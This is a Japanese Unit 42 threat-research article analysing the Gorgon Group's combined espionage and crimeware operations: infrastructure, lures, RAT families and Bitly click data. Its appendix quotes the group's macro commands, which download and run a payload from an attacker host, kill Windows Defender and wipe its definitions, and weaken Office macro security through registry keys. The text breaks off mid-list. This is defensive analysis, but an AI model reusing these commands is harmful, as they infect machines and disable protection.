[![Logo](https://www.paloaltonetworks.com/wp-content/uploads/2021/07/PANW_Parent.png)](https://www.paloaltonetworks.jp/)  
[![Unit42 Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/unit42-logo-white.svg)](https://unit42.paloaltonetworks.com/ja/)  
Menu

* [セキュリティ コンサルティング](https://www.paloaltonetworks.com/unit42)
* [**現在、攻撃を受けていますか?**](https://start.paloaltonetworks.com/contact-unit42.html)  
  Japanese
* [English](https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/)
* [Japanese](https://unit42.paloaltonetworks.com/ja/unit42-gorgon-group-slithering-nation-state-cybercrime/)
* [Threat Research Center](https://unit42.paloaltonetworks.com/ja/ "Threat Research")
* [脅威アクター グループ](https://unit42.paloaltonetworks.com/ja/category/threat-actor-groups-ja/ "脅威アクター グループ")
* [脆弱性](https://unit42.paloaltonetworks.com/ja/category/vulnerabilities-ja/ "脆弱性")  
  [脆弱性](https://unit42.paloaltonetworks.com/ja/category/vulnerabilities-ja/)

# 国家への標的型攻撃とサイバー犯罪を継続するGorgon Groupの詳細

![Clock Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-clock.svg) 5 分で読めます  
Related Products  
[![Advanced WildFire icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Advanced WildFire](https://unit42.paloaltonetworks.com/ja/product-category/advanced-wildfire-ja/ "Advanced WildFire")[![Cortex XDR icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/cortex_RGB_logo_Icon_Color.png)Cortex XDR](https://unit42.paloaltonetworks.com/ja/product-category/cortex-xdr-ja/ "Cortex XDR")

* ![Profile Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-profile-grey.svg)  
  著者:
  
  * [David Fuertes](https://unit42.paloaltonetworks.com/ja/author/david-fuertes/)
  * [Kyle Wilhoit](https://unit42.paloaltonetworks.com/ja/author/kyle-wilhoit/)

* ![Published Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-calendar-grey.svg)  
  公開日:2018年8月2日

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-category.svg)  
  カテゴリー
  
  * [脆弱性](https://unit42.paloaltonetworks.com/ja/category/vulnerabilities-ja/)
  * [マルウェア](https://unit42.paloaltonetworks.com/ja/category/malware-ja/)
  * [脅威アクター グループ](https://unit42.paloaltonetworks.com/ja/category/threat-actor-groups-ja/)
  * [脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/)

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-tags-grey.svg)  
  タグ:
  
  * [CVE-2017-0199](https://unit42.paloaltonetworks.com/ja/tag/cve-2017-0199-ja/)
  * [Gorgon Group](https://unit42.paloaltonetworks.com/ja/tag/gorgon-group-ja/)
  * [Subaat](https://unit42.paloaltonetworks.com/ja/tag/subaat-ja/)

* [![Download Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-download.svg)](https://unit42.paloaltonetworks.com/ja/unit42-gorgon-group-slithering-nation-state-cybercrime/?pdf=download&lg=ja&_wpnonce=0e8fcd9e01 "Click here to download")

* [![Print Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-print.svg)](https://unit42.paloaltonetworks.com/ja/unit42-gorgon-group-slithering-nation-state-cybercrime/?pdf=print&lg=ja&_wpnonce=0e8fcd9e01 "Click here to print")

共有![Down arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/down-arrow.svg)

* ![Link Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-share-link.svg)
* [![Link Email](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-sms.svg)](mailto:?subject=国家への標的型攻撃とサイバー犯罪を継続するGorgon%20Groupの詳細&body=Check%20out%20this%20article%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Funit42-gorgon-group-slithering-nation-state-cybercrime%2F "Share in email")
* [![Facebook Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-fb-share.svg)](https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Funit42-gorgon-group-slithering-nation-state-cybercrime%2F "Share in Facebook")
* [![LinkedIn Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-linkedin-share.svg)](https://www.linkedin.com/sharing/share-offsite/?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Funit42-gorgon-group-slithering-nation-state-cybercrime%2F&title=国家への標的型攻撃とサイバー犯罪を継続するGorgon%20Groupの詳細 "Share in LinkedIn")
* [![Twitter Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-twitter-share.svg)](https://twitter.com/intent/tweet?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Funit42-gorgon-group-slithering-nation-state-cybercrime%2F&text=国家への標的型攻撃とサイバー犯罪を継続するGorgon%20Groupの詳細 "Share in Twitter")
* [![Reddit Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-reddit-share.svg)](https://www.paloaltonetworks.com//www.reddit.com/submit?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Funit42-gorgon-group-slithering-nation-state-cybercrime%2F&ts=markdown "Share in Reddit")
* [![Mastodon Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-mastodon-share.svg)](https://mastodon.social/share?text=国家への標的型攻撃とサイバー犯罪を継続するGorgon%20Groupの詳細%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Funit42-gorgon-group-slithering-nation-state-cybercrime%2F "Share in Mastodon")

## 概要

パロアルトネットワークスの脅威インテリジェンスチームUnit 42のリサーチャーは、2017年以来[Subaat](https://blog.paloaltonetworks.com/2017/10/unit42-tracking-subaat-targeted-phishing-attacks-point-leader-threat-actors-repository/)という攻撃者を追跡してきました。最近、Subaatは標的型攻撃活動を再開したことが判明しました。この攻撃者は、世界の政府機関に標的型攻撃を仕掛ける、個人から構成されるより大きな攻撃グループの一員である可能性があります。攻撃の一部の技術的分析およびパキスタンの攻撃者との特徴的なつながりは、既に指摘されています（[360](https://ti.360.net/blog/articles/analysis-of-office-ole-sample/)および[Tuisec](https://paper.tuisec.win/detail/eaff0936fcdaaa6)）。今回のブログ記事では、Unit 42のリサーチャーが追跡していた大規模な攻撃者グループとの興味深いつながりについて解説します。弊社はこのグループをGorgon Groupと呼んでいます。

Unit 42は、このグループが、数多くの標的型攻撃に加えて、世界中でしつこく繰り返しされる犯罪行為にも関与していることを発見しました。Unit 42は、2018年2月以降、Gorgon Groupメンバーによるイギリス、スペイン、ロシア、および米国の政府機関を標的にした攻撃活動を特定しています。またその間、Gorgon Groupメンバーは、世界中で犯罪活動も行っています。犯罪活動では、多くが政府機関への標的型攻撃作戦と共通のインフラストラクチャが使用されていました。

Gorgon Groupの活動は、従来のコマンド\&コントロール(C2)ドメインの使用に加えて、一般的な短縮URLサービスを使用してペイロードをダウンロードし、最終的にクリック カウントと統計データの広範なリストを提供していた点や、多様で活発的な犯罪的活動を行っている点が興味深いです。弊社は、C2インフラストラクチャの多くで、複数のクライムウェア ファミリのサンプルを特定しました。NjRatなどのRATおよびLokibotなどの情報窃取マルウェアは、標的型攻撃のものと同じC2インフラストラクチャを利用していました。

標的型攻撃と犯罪活動、両方の攻撃スタイルは、数多くのおとりドキュメントおよびフィッシング メールを使用していて、全体的な精巧さには欠けていましたが、このグループとその攻撃キャンペーンの有効性は否定できません。

### 攻撃の配信およびインフラストラクチャ分析

攻撃者のインフラストラクチャにホストされていることがわかった「.vbs」、「.doc」および「.exe」サンプルの分析と攻撃方法については、前述の360とTuisecでいくつか取り上げられています。一貫した攻撃パターンが、最も一般的でもある次のステージから構成されていることが発見されています。

![](https://unit42.paloaltonetworks.com/wp-content/uploads//2020/02/word-image-127.png)

図1: 基本的な攻撃方法

初期ステージのフィッシングの試みは、通常Bitlyやt2m\[.\]ioなどの短縮URLサービスを使用するOLE2Linkオブジェクトを使用し、非常に単純で軽量です。

![](https://unit42.paloaltonetworks.com/wp-content/uploads//2020/02/word-image-128.png)

図2 OLE2Linkコンテンツの例

Unit 42のリサーチャーは、Gorgon Groupのフィッシング コンポーネントが使用するドメインおよびインフラストラクチャを調査しているとき、Gorgon Groupの多くの攻撃キャンペーン全体に共通して運用上のセキュリティ(OpSec)ミスが複数みられることを発見しました。こうしたOpSec上の失敗のひとつが、Gorgon Groupが使用するマルウェアを横断的に見る機会へとつながりました。このディレクトリに含まれていたのは、上記の国家に対する標的型攻撃で利用されたファイルの組み合わせで、犯罪を目的として使用される極めて多量のマルウェア サンプルが含まれていました。

![](https://unit42.paloaltonetworks.com/wp-content/uploads//2020/02/word-image-129.png)

図3: hxxp://stevemike-fireforce\[.\]info/のオープン ディレクトリ リスト

最初に特定されたオープン ディレクトリのコンテンツおよび構造に基づき、いくつかのインフラストラクチャ パターンが使用されていることを発見できました。ドメイン構造およびマルウェア配信コンテンツの例を次の表に示します。

|------------------------------------------------------------------|----------------------------------|
| **SHA-256**                                                      | **インフラストラクチャのURL**               |
| 4e4967e3d39256049bc1054b966e5c609245fd3b2a934fda5cd1885526d8221e | stemtopx\[.\]com/work/1.doc      |
| d2f58b08f8abfe5055f3c1f0b8d991dfe1deb62807a5336b134ce2fb36d87284 | stemtopx\[.\]com/work/3.exe      |
| db4d8d931f1b979cf32d311f9b03e851d3283b4f7e86252730247da25cf9f093 | stemtopx\[.\]com/work/2.exe      |
| 4c6e3d8fdb2394edffe4a5bc45a238749e929301efa8bcfa3a247b1ab68eac54 | stemtopx\[.\]com/work/1.exe      |
| 81de431987304676134138705fc1c21188ad7f27edf6b77a6551aa693194485e | stemtopx\[.\]com/work/new/20.exe |
| 26151f1e24bc97532e49013fbe04919de1f51e346dba1f10ce2e389160f2fb9d | stemtopx\[.\]com/work/new/3.exe  |
| a100ce0a67c5890bcc38d2b6e30f9164dfe266126ec40a2fd7eb8e941dc7d025 | stemtopx\[.\]com/work/new/2.exe  |
| 806098afc2148dabb838b24c4dfaa148269ac3ddf769aee54e75d46bfef0c506 | stemtopx\[.\]com/work/doc/20.doc |
| bf37d6cb393b440f790ad2b333624fde079e10bfaeb44d65188e3ccc551c982f | stemtopx\[.\]com/work/k/1.docx   |
| 81de431987304676134138705fc1c21188ad7f27edf6b77a6551aa693194485e | stemtopx\[.\]com/work/k/1s.exe   |

*表1: hxxp://stemtopx\[.\]comのマルウェア サンプルとインフラストラクチャ*

|--------------------------------------------|
| **パターン例**                                  |
| \[domain\]/work/docnew/\[filename\]        |
| \[domain\]/administrator/help/\[filename\] |
| \[domain\]/xe/m/\[filename\]               |
| \[domain\]/xe/s/\[filename\]               |
| \[domain\]/images/yupsia/exe/\[filename\]  |
| \[domain\]/images/yupsia/doc/\[filename\]  |

*表2: ドメイン パターンの例*

### Gorgon Groupの構成メンバーの内訳

アクセス可能なディレクトリをその他の運用上のセキュリティ欠陥と組み合わせて検索することによって、Gorgon Groupのメンバーの全貌が明らかになってきました。360とTuisecは、何人かのGorgon Groupのメンバーを既に特定しました。Subaatに加えて、攻撃を実行するその他4人の攻撃者をGorgon Groupの一部とみなしました。攻撃者が物理的にパキスタンに在住しているかどうかは不明ですが、オンライン上のペルソナに基づくとGorgon Groupのすべてのメンバーがパキスタンにいることになっています。

#### **fudpages**

弊社が「fudpages」と呼んでいるGorgon Groupのあるメンバーは、共有インフラストラクチャの使用に基づくこの攻撃キャンペーンにおいて見つかりました。弊社リサーチャーの注目を引いたのは、ある特定のMicrosoftドキュメントでした。 (446e1c80102c8b9662d66d44525cb9f519369061b02446e0d4cd30cd26d79a25)

このMicrosoft Wordのドキュメントは、電子メールを介して米国とスイスのいくつかの企業に送信されました。Unit 42は、このドキュメントが他のGorgon Groupのメンバーによっても攻撃に使用された追加のマルウェアをC2から引き出したことに気付きました。また、このドキュメントは、比較的新しいC2インフラストラクチャであるumarguzardijye\[.\]comと通信していました。このインフラストラクチャは91\[.\]234\[.\]99\[.\]206にホストされています。

![](https://unit42.paloaltonetworks.com/wp-content/uploads//2020/02/word-image-130.png)

図4 umarguzardijye\[.\]comのWHOIS情報

Fudpagesは、その他のGorgon Groupメンバーと同様に、多くのOpSec上の過ちを犯していました。

![](https://unit42.paloaltonetworks.com/wp-content/uploads//2020/02/word-image-131.png)

図5 umarguzardijye\[.\]comのオープン ディレクトリ

新しいドメインumarguzardijye\[.\]comのWHOISレコードは、登録者組織が「fudpages」で、アドレスがパキスタンで提供されたことを示しています。umarguzardijye\[.\]comをホストしているIPを詳細に調べると、91\[.\]234\[.\]99\[.\]206が2つの追加ドメイン(fudpages\[.\]ruおよびfudpage\[.\]ru)をホストしていることが判明しました。Fudpageは、防弾ホスティング、RDPセッション、偽のドキュメントなどの悪意のある製品を大量に販売する小規模市場のようです。

![](https://unit42.paloaltonetworks.com/wp-content/uploads//2020/02/word-image-132.png)

図6 FUD pages and spamming toolsの広告Webサイト

fudpageにはいくつかの連絡先情報がリスト化されていて、この情報からは、地下フォーラムで悪意のある製品を販売、配信および取引している地下のペルソナに最終的にたどりつけます。

![](https://unit42.paloaltonetworks.com/wp-content/uploads//2020/02/word-image-133.png)

図7: RATを掲示している地下フォーラム

fudpagesは遅くとも2016年から地下で活動しており、また、Youtubeのようなストリーミング サイトでも活動していて、サイトを広告プラットフォームとして使用しています。

![](https://unit42.paloaltonetworks.com/wp-content/uploads//2020/02/word-image-134.png)

図8: 悪意のある活動を実行する方法についてのYoutubeビデオ投稿

Gorgon Groupの他のすべてのメンバーと同様に、Fudpageのオンライン プロファイル、インフラストラクチャの利用形態や標準化は、Gorgon Groupに結び付いています。Gorgon Groupとのこの結び付きは、Gorgon Groupが最も頻繁に使用する、標準化されているように見える手法を説明するのに役立ちます。

### 2つの意図: 犯罪と標的型攻撃

調査の一環として、Unit 42のリサーチャーは、サイバー犯罪と標的型攻撃の共有インフラストラクチャをGorgon Groupの構成メンバーが使用する方法について興味深い特徴を特定できました。構成メンバーは、ずっと同じドメインのインフラストラクチャを使用して通常の犯罪と標的型攻撃の両方を組み合わせており、TTPを変更することはあまりありません。

2月中旬から、Unit 42のリサーチャーは、犯罪と標的型攻撃にGorgon Groupが利用するインフラストラクチャの大部分を共有しているアクティブな攻撃キャンペーンを追跡しました。下図9で、赤は標的型攻撃キャンペーンに関連する標的のIPアドレス、マルウェア、登録情報、およびドメインを示し、青は犯罪的攻撃のIPアドレス、使用マルウェア、登録情報、およびドメインを示します。

![](https://unit42.paloaltonetworks.com/wp-content/uploads//2020/02/word-image-135.png)

図9: インフラストラクチャの重複

Gorgon Groupの活動を総括的に見ると同時に、キャンペーン期間中の総クリック数を見ても興味深いものが発見できます。Bitlyのキャンペーンのクリック回数を利用して、Gorgon Groupの活動量が4月を通じて増加していることがわかりました。

![](https://unit42.paloaltonetworks.com/wp-content/uploads//2020/02/word-image-136.png)

図10: Gorgon Groupのインフラストラクチャで経時的に実行された総クリック回数

サイバー犯罪と標的型攻撃の両方で使用された1つのドメインを特に観察すると、攻撃キャンペーンをミクロの視点から確認できます。2018年4月1日から2018年5月30日までの間、ドメインstevemike-fireforce\[.\]infoが、最初の攻撃で2,300を超える電子メールおよび19のドキュメントが関与するGorgon Groupのサイバー犯罪活動に使用されたことがわかりました。この同じドメインは、同じ期間にいくつかの世界中の国家機関に対する標的型攻撃にも使用されました。

データ分析によって、Unit 42のリサーチャーはいくつかの結論を得ました。

* いくつかの固有ドメインがサイバー犯罪と標的型攻撃の両方に使用されている。
* サイバー犯罪のセッションの量は予想どおり標的型攻撃よりも多い。
* 標的型攻撃の発生時期に特定のパターンはなく、ドメインはまずサイバー犯罪に使用され、ほとんどなんの前触れもないまま素早く標的型攻撃に使用される。

下図11のグラフィック表示は、キャンペーンがあった期間にこのドメインで観察された固有セッションの量を示しており、攻撃の意図が2つの別の領域にあることを表しています。

4月24日を観察すると興味深い事実を発見できます。このドメインは、世界のいくつかの政府機関を狙って標的型攻撃を配信していて、その最中にマルスパム活動の配信にも使用されています。この標的型攻撃に使用されていた件名は、「Pakistan eying Sukhoi-35 figther planes as part of defense deal from Rusia」でした。

![](https://unit42.paloaltonetworks.com/wp-content/uploads//2020/02/word-image-137.png)

図11 stevemike-fireforce\[.\]infoに対するクライムウェアの活動と標的型の活動

次の図12をみると、日付ごと、目的ごとの固有の攻撃の量をより明確に理解できます。標的型攻撃の量を赤で、クライムウェア攻撃の量を緑で示しています。

![](https://unit42.paloaltonetworks.com/wp-content/uploads//2020/02/word-image-138.png)

図12: stevemike-fireforce\[.\]infoを使用したクライムウェア活動と標的型活動の量

1つのドメインに注目すると、その使用量をすばやく理解でき、それがより大規模なマルスパム キャンペーンにどのように相互接続しているかをより明確に把握できます。

### 目的1: サイバー犯罪

犯罪的攻撃は、このグループにとって新しいものではなく、いくつかは、Gorgon GroupメンバーのSubaatに関する以前の[ブログ](https://blog.paloaltonetworks.com/2017/10/unit42-tracking-subaat-targeted-phishing-attacks-point-leader-threat-actors-repository/)で取り上げられています。現在のキャンペーン中に、Gorgon Groupの犯罪活動は2月中旬から現在までで132,840のBitlyクリックを得ました。大規模に複数の業界を横断的に標的としているため、犯罪活動中、標的に関する情報はほとんどありませんでした。

![](https://unit42.paloaltonetworks.com/wp-content/uploads//2020/02/word-image-139.png)

*図13.全世界における犯罪的攻撃によるBitlyリンクのクリック数*

クライムウェア配信の大部分は、よく知られた「発注書」や「[SWIFT](https://en.wikipedia.org/wiki/Society_for_Worldwide_Interbank_Financial_Telecommunication)」ルアー(わな)を利用した標準のマルスパム キャンペーンを介して行われました。大半のファイル名に、次のようなファイル名のバリエーションが含まれていました。

* SWIFT {Date}.doc
* SWIFT COPY.doc
* PURCHASE ORDER {Random Value}.doc 　(Purchase order=発注書)
* DHL\_RECEIPT {Random Value}.doc
* SHIPPING RECEIPT {Date}.doc

実際のところ、グループによって使用されたツールは、一般的なクライムウェアと標的型の攻撃での違いはありません。どちらの場合も、いくつかのリモート アクセスとデータ窃取マルウェア ファミリに関連していました。これまでに実際に悪意があるものとして特定された上位5つのマルウェア ファミリは次のとおりです。

* NjRAT: NjRATは、一般に使用されているリモートアクセス トロイの木馬で、早くも2013年から犯罪的攻撃と標的型攻撃の両方の攻撃で目撃されています。
* RevengeRAT: RevengeRAT は、2016年に地下フォーラムで無料でリリースされたリモートアクセス トロイの木馬です。RevengeRATは標的型攻撃キャンペーンで使用されることもありますが、一般に、犯罪的マルスパム キャンペーンで目撃されています。
* LokiBot: LokiBotは、地下サイトで販売されている商用マルウェアで、感染したマシンから個人データを窃取し、その後、その情報をHTTP POSTを介してコマンド\&コントロール ホストへ送信するように設計されています。このような個人データには、保存されていたパスワード、Webブラウザからのログイン資格情報、各種仮想通貨ウォレットが含まれます。
* RemcosRAT: RemcosRATは、最初に2016年7月に地下フォーラムに現れたリモートアクセス トロイの木馬です。RemcosRATは、悪意のあるマクロを伴うMicrosoft Wordドキュメントを作成できる機能豊富なビルダーを備えています。
* NanoCoreRAT: 一般にフィッシングを介して配信されるNanoCoreRATは、バック ドアを開いて、侵害したコンピュータから情報を窃取するリモートアクセス トロイの木馬です。

Gorgon Groupの犯罪活動について興味深い点の1つが、Bitlyの使用法です。彼らの標的型攻撃の場合と同様に、Gorgon Groupは、C2ドメインの配信と短縮のためにBitlyを活用しました。犯罪活動と標的型活動の双方で同じ手法を使用しているため、私たちは、Gorgon Groupのインフラストラクチャと活動を容易に総括することができました。

![](https://unit42.paloaltonetworks.com/wp-content/uploads//2020/02/word-image-140.png)

図14.犯罪的攻撃でのBitlyリンクのクリック数

全体として、Gorgon Groupの活動には精巧さが欠落しているにも関わらず、彼らは攻撃を比較的継続して成功させていました。適切な防御を行っていない個人に対する単純な攻撃が功を奏していることが実証されています。

### 目的2: 標的型攻撃

2018年3月初旬から、Unit 42は、ロシア、スペイン、および米国の政府機関に対するパキスタン国内からの標的型攻撃を観測し始めました。調査を続けるにつれ、Gorgon Groupが一貫して、パキスタン国内から世界中の政府組織を標的として活動していることが明らかになりました。Gorgon Groupは、彼らの方法にマイナーな変更を加えていますが、引き続き活発に、標的型攻撃と犯罪的攻撃に関わっています。

このGorgon Groupキャンペーンでは、[CVE-2017-0199](https://nvd.nist.gov/vuln/detail/CVE-2017-0199)をエクスプロイトするMicrosoft Wordドキュメントを用いたスピア フィッシング メールを活用していました。このキャンペーンに関係するスピア フィッシング メールは、ほとんどの場合、パキスタン軍の著名な中佐など、正規の個人になりすましたGmailアカウントから発信されていました。

スピア フィッシング メールの件名も興味深く、通常は、テロリスト グループ、軍事活動、または政治問題に関する主題が含まれていました。

* Acting FOREIGN Minister of Pakistan (パキスタンの外務大臣代理)
* Invitation to lady wives of H.E.Ambassador/High Commissioner from lady wife of H.E.High Commissioner of Bangladesh (バングラデシュのH.E.高等弁務官夫人からのH.E.大使/高等弁務官夫人への招待)
* Pakistan eying Sukhoi-35 fighter planes as part of defense deal from Russia 2018.143 (パキスタンがロシア2018.143からの防衛対策の一部としてSukhoi-35戦闘機を検討)
* PG COURSE IN 2018-2021 BATCH India Bangladesh and Pakistan (パプアニューギニアが2018～2021年のインド バングラデシュとパキスタンの統合に着手)
* Press Release on Observance of Historic Mujibnogor Dibosh by Pakistan Mission on 17 April 2018 (2018年4月17日のパキスタンのミッションによる歴史的なMujibnogor Diboshの順守に関するプレス リリース)
* Afghan Bomb Blast report by ISI (ISIによるアフガンの爆風レポート)
* USAJOBS Daily Saved Search Results for New GS15 for 3/30/2018 (2018年3月30日の新しいGS15に関してUSAJOBS Dailyが保存した検索結果)
* How Rigging take place in Senate Elections in Pakistan (パキスタンの上院選挙でどのように不正が行われたか)
* Afghan Terrorist group details ISI Restricted113 (アフガンのテロリスト グループがISI Restricted113を詳解)
* 1971 Liberation War Freedom Fighters in Pakistan Army Custody Database (パキスタン陸軍管理のデータベースにおける1971年に戦争から解放された戦士)

さらに、これらの攻撃では以下のファイル名が目撃されました(スペルと文法の間違いが含まれる)。

* Liberation Freedom Fighter.xlam
* NSC details of participants.xlam
* Raw Sect Vikram report on Pak Army Confidential.doc
* USA Immagration Policy for Families.ppam
* CV.doc
* CV FM.doc
* invitation.doc
* Sukhoi35 deal report.doc
* Nominal Roll.doc
* Press Release 17 April.doc
* Afghan Blast report by ISI.doc
* Rigging in Pakistan Senate.doc
* Afghan Terrorist group report.doc

これらの攻撃のペイロードは、マルウェア ファミリ内で異なっていました。一般的なNanoCoreRAT、QuasarRAT、およびNJRAT亜種が頻繁に使用されていました。

これらの多数の攻撃では、最終的にこれらの攻撃のペイロードを配信するために、普及しているサードパーティ製URL短縮サービスBitlyが使用されていました。

重要なことは、Bitlyリンクの使用はクリックの正確な地理的な場所を判断するためには有益とはいえ、これらのリンクをクリックする誰もが(リサーチャーを含め)カウントされている点です。そのため、このクリック情報を保持することは貴重ですが、それは、標的に関する全体像の中の一部に過ぎません。

![Gorgon\_15](https://unit42.paloaltonetworks.com/wp-content/uploads/2018/08/Gorgon_15.png)

図15. Gorgon Group C2ドメインに関連するBitlyクリック情報

最も重い負荷が集中したBitly URLのやり取りは、パキスタンからのものでした。それは、全クリックの39%を占める410クリックでした。米国では、19%に相当する194クリックが収集されました。

![Gorgon\_16](https://unit42.paloaltonetworks.com/wp-content/uploads/2018/08/Gorgon_16.png)

図16 標的型攻撃でのBitlyリンクのクリック数

攻撃は主に、今年の3月、4月下旬、5月上旬に仕掛けられました。

## 結論

国家レベルの攻撃と犯罪的攻撃の両方を行うことが確認された攻撃者グループはGorgon Groupが初めてではありません。しかしGorgon Groupがユニークなのは、数々のOpSec上の過ちを犯しながらもなお、かなりの攻撃成果をあげ続けていたことです。Gorgon Groupに参加した攻撃者を詳しく調べたところ、攻撃の内情について独特の視点が得られました。

こうして標的型攻撃と犯罪活動に同じインフラストラクチャを活用することから、様々な動機が絡み合う攻撃者たちの側面が浮かびあがってくるのも興味深い点です。しかもこの入り組んだ動機こそが、Gorgon Groupメンバーの数人がパキスタンに結び付きがあるという結論に至った理由でもあるのです。Gorgon Groupは継続して活発に活動していますが、パロアルトネットワークスのお客様は、この脅威から以下に示す方法で保護されています。

* WildFireは、悪意があると判断された現在のGorgon Groupファイルをすべて検出します。
* AutoFocusをご使用のお客様は、[Gorgon Group](https://autofocus.paloaltonetworks.com/#/tag/Unit42.GorgonGroup)攻撃者タグでこれらのサンプルを調べることができます。
* Trapsは、Gorgon Groupに現在関連付けられているすべてのファイルをブロックします。

## 付録

### 標的型攻撃の分析

#### 「1971 Liberation War Freedom Fighters in Pakistan Army Custody Database (パキスタン陸軍管理のデータベースにおける1971年に戦争から解放された戦士)」

標的型攻撃で使用された配信文書は、システムへの侵害を試みるマクロを含んだMicrosoft Officeドキュメントです。感染プロセスはかなり興味深く、最終的にNanoCore RAT (リモート管理ツール)をリモート サーバーからダウンロードし、それを別のプロセスに挿入する.NETアセンブリの複数のレイヤーが含まれています。場合によっては、最終ペイロードとして配信されたRemcosRATマルウェア ファミリが観察されたこともあります。感染プロセスは、ペイロードをダウンロードして実行するだけでなく、プロセス全体に対する受信者の疑いを低減するためにおとりドキュメントもダウンロードして開きます。さらに、プロセスは、Microsoft OfficeとWindows Defenderのセキュリティ機能を無効にすることで、システムの全体的なセキュリティの低減を試みます。ペイロード自体は、オンラインから無料で入手可能な正規のソース コードを使用して悪意のあるコードを開発者がラップしている点で興味深いと言えます。

#### 配信文書

配信文書には、リモート サーバーから実行可能ファイルをダウンロードするためのマクロが含まれています。マクロは、次のコマンド ライン プロセスを実行することで、hxxp://lokipanelhostingpanel\[.\]gq/work/kh/1.exe (SHA256: 84ed59953f57f5927b9843f35ca3c325155d5210824d3b79b060755827b51f72)からペイロードをダウンロードします。  
cmd.exe /c powershell -W Hidden (New-Object System.NeT.WeBClieNT).DownloadFile('http://lokipanelhostingpanel\[.\]gq/work/kh/1.exe','%Public%\\\\\\\\svchost32.exe');Start-Process '%Public%\\\\\\\\svchost32.exe

|---|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 | cmd.exe /c powershell -W Hidden (New-Object System.NeT.WeBClieNT).DownloadFile('http://lokipanelhostingpanel\[.\]gq/work/kh/1.exe','%Public%\\\\\\\\svchost32.exe');Start-Process '%Public%\\\\\\\\svchost32.exe |

その後、マクロは「taskkill」コマンドを使用して、Microsoft OfficeとWindows Defenderのプロセスの停止を試みます。コマンドは、固有の配信ドキュメント(この「.xlam」ファイルの場合はExcelなど)をロードする特定のOfficeプロセスの停止は試みませんが、代わりに、Word、Excel、PowerPoint、およびPublisherに関連付けられたプロセスの停止を試みます。該当するプロセスを停止するためのこの包括的なアプローチは、攻撃者が、これらのMicrosoft Officeアプリケーション内で作成したすべての配信ドキュメントにおいて、彼らのマクロ内のこのコマンドを変更していないことを示唆しています。コマンドは、Windows Defenderプロセスの停止を試みるだけでなく、アンチウイルス アラートをトリガーしないように検出定義の消去も試みます。マクロは、これらの活動のすべてを、次のコマンドで実行します。  
cmd /c taskkill /f /im winword.exe\&amp;taskkill /f /im Excel.exe\&amp;taskkill /f /im MSPUB.exe\&amp;taskkill /f /im POWERPNT.EXE\&amp;taskkill /f /im MSASCuiL.exe\&amp;taskkill /f /im MpCmdRun.exe\&amp;cd ""%ProgramFiles%\\Windows Defender"" \&amp; MpCmdRun.exe -removedefinitions -dynamicsignatures \&amp; exit

|---------|---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 | cmd /c taskkill /f /im winword.exe\&amp;taskkill /f /im Excel.exe\&amp;taskkill /f /im MSPUB.exe\&amp;taskkill /f /im POWERPNT.EXE\&amp;taskkill /f /im MSASCuiL.exe\&amp;taskkill /f /im MpCmdRun.exe\&amp;cd ""%ProgramFiles%\\Windows Defender"" \&amp; MpCmdRun.exe -removedefinitions -dynamicsignatures \&amp; exit |

また、このマクロは、レジストリを変更して、Microsoft Office製品内のセキュリティ メカニズムを無効化しようとします。まず、マクロは、以下のレジストリ キーの値を1に設定して、複数バージョンのWord、PowerPoint、PublisherおよびExcelでマクロを有効化しようとします。  
HKCU\\Software\\Microsoft\\Office\\11.0\\Word\\Security\\VBAWarnings HKCU\\Software\\Microsoft\\Office\\12.0\\Word\\Security\\VBAWarnings HKCU\\Software\\Microsoft\\Office\\14.0\\Word\\Security\\VBAWarnings HKCU\\Software\\Microsoft\\Office\\15.0\\Word\\Security\\VBAWarnings HKCU\\Software\\Microsoft\\Office\\16.0\\Word\\Security\\VBAWarnings HKCU\\Software\\Microsoft\\Office\\11.0\\PowerPoint\\Security\\VBAWarnings HKCU\\Software\\Microsoft\\Office\\12.0\\PowerPoint\\Security\\VBAWarnings HKCU\\Software\\Microsoft\\Office\\14.0\\PowerPoint\\Security\\VBAWarnings HKCU\\Software\\Microsoft\\Office\\15.0\\PowerPoint\\Security\\VBAWarnings HKCU\\Software\\Microsoft\\Office\\16.0\\PowerPoint\\Security\\VBAWarnings HKCU\\Software\\Microsoft\\Office\\11.0\\publisher\\Security\\VBAWarnings HKCU\\Software\\Microsoft\\Office\\12.0\\publisher\\Security\\VBAWarnings HKCU\\Software\\Microsoft\\Office\\14.0\\publisher\\Security\\VBAWarnings 